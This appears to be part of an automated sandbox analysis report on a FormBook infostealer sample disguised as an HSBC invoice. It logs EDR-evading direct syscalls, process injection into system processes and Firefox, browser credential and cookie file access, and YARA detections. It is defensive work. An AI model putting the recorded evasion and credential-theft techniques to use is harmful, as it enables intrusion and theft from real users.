            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD4978 mov eax, dword ptr fs:[00000030h]2_2_03DD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBC97C mov eax, dword ptr fs:[00000030h]2_2_03DBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D56962 mov eax, dword ptr fs:[00000030h]2_2_03D56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D56962 mov eax, dword ptr fs:[00000030h]2_2_03D56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D56962 mov eax, dword ptr fs:[00000030h]2_2_03D56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7096E mov eax, dword ptr fs:[00000030h]2_2_03D7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7096E mov edx, dword ptr fs:[00000030h]2_2_03D7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D7096E mov eax, dword ptr fs:[00000030h]2_2_03D7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBC912 mov eax, dword ptr fs:[00000030h]2_2_03DBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D28918 mov eax, dword ptr fs:[00000030h]2_2_03D28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D28918 mov eax, dword ptr fs:[00000030h]2_2_03D28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE908 mov eax, dword ptr fs:[00000030h]2_2_03DAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DAE908 mov eax, dword ptr fs:[00000030h]2_2_03DAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DB892A mov eax, dword ptr fs:[00000030h]2_2_03DB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC892B mov eax, dword ptr fs:[00000030h]2_2_03DC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03D5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E008C0 mov eax, dword ptr fs:[00000030h]2_2_03E008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03D6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03D6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03DFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBC89D mov eax, dword ptr fs:[00000030h]2_2_03DBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D30887 mov eax, dword ptr fs:[00000030h]2_2_03D30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D60854 mov eax, dword ptr fs:[00000030h]2_2_03D60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D34859 mov eax, dword ptr fs:[00000030h]2_2_03D34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D34859 mov eax, dword ptr fs:[00000030h]2_2_03D34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D42840 mov ecx, dword ptr fs:[00000030h]2_2_03D42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBE872 mov eax, dword ptr fs:[00000030h]2_2_03DBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBE872 mov eax, dword ptr fs:[00000030h]2_2_03DBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC6870 mov eax, dword ptr fs:[00000030h]2_2_03DC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DC6870 mov eax, dword ptr fs:[00000030h]2_2_03DC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DBC810 mov eax, dword ptr fs:[00000030h]2_2_03DBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h]2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h]2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h]2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D52835 mov ecx, dword ptr fs:[00000030h]2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h]2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D52835 mov eax, dword ptr fs:[00000030h]2_2_03D52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D6A830 mov eax, dword ptr fs:[00000030h]2_2_03D6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD483A mov eax, dword ptr fs:[00000030h]2_2_03DD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03DD483A mov eax, dword ptr fs:[00000030h]2_2_03DD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03E04FE7 mov eax, dword ptr fs:[00000030h]2_2_03E04FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03D2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03D2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03D2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D32FC8 mov eax, dword ptr fs:[00000030h]2_2_03D32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D32FC8 mov eax, dword ptr fs:[00000030h]2_2_03D32FC8
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00ED81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00ED81F7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EAA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EAA395
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EAA364 SetUnhandledExceptionFilter,0_2_00EAA364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtQueryVolumeInformationFile: Direct from: 0x76F12F2CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtQuerySystemInformation: Direct from: 0x76F148CCJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtAllocateVirtualMemory: Direct from: 0x76F148ECJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtQueryAttributesFile: Direct from: 0x76F12E6CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtReadVirtualMemory: Direct from: 0x76F12E8CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtCreateKey: Direct from: 0x76F12C6CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtSetInformationThread: Direct from: 0x76F12B4CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtAllocateVirtualMemory: Direct from: 0x76F13C9CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtWriteVirtualMemory: Direct from: 0x76F1490CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtCreateUserProcess: Direct from: 0x76F1371CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtTerminateThread: Direct from: 0x76F12FCCJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtCreateFile: Direct from: 0x76F12FECJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtOpenFile: Direct from: 0x76F12DCCJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtQueryInformationToken: Direct from: 0x76F12CACJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtAllocateVirtualMemory: Direct from: 0x76F12BECJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtDeviceIoControlFile: Direct from: 0x76F12AECJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtSetInformationThread: Direct from: 0x76F063F9Jump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtOpenSection: Direct from: 0x76F12E0CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtMapViewOfSection: Direct from: 0x76F12D1CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtResumeThread: Direct from: 0x76F136ACJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtUnmapViewOfSection: Direct from: 0x76F12D3CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtCreateMutant: Direct from: 0x76F135CCJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtWriteVirtualMemory: Direct from: 0x76F12E3CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtNotifyChangeKey: Direct from: 0x76F13C2CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtProtectVirtualMemory: Direct from: 0x76F07B2EJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtProtectVirtualMemory: Direct from: 0x76F12F9CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtSetInformationProcess: Direct from: 0x76F12C5CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtOpenKeyEx: Direct from: 0x76F12B9CJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtQueryInformationProcess: Direct from: 0x76F12C26Jump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtResumeThread: Direct from: 0x76F12FBCJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtDelayExecution: Direct from: 0x76F12DDCJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtReadFile: Direct from: 0x76F12ADCJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtQuerySystemInformation: Direct from: 0x76F12DFCJump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 7272Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\rundll32.exeThread APC queued: target process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3133008Jump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00ED8C93 LogonUserW,0_2_00ED8C93
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E83B4C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E84A35
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE4EF5 mouse_event,0_2_00EE4EF5
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"Jump to behavior
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00ED81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00ED81F7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EE4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00EE4C03
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723635161.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000000.1448153514.0000000001A11000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723635161.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000000.1448153514.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3723958940.0000000001AE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723635161.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000000.1448153514.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3723958940.0000000001AE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723635161.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000000.1448153514.0000000001A11000.00000002.00000001.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3723958940.0000000001AE1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EA886B cpuid 0_2_00EA886B
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EB50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00EB50D7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EC2230 GetUserNameW,0_2_00EC2230
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00EB418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00EB418A
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exeCode function: 0_2_00E84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00E84AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeBinary or memory string: WIN_81
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeBinary or memory string: WIN_XP
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeBinary or memory string: WIN_XPe
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeBinary or memory string: WIN_VISTA
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeBinary or memory string: WIN_7
            Source: HSBCscancopy-invoice778483-payment87476MT103.exeBinary or memory string: WIN_8
            Source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
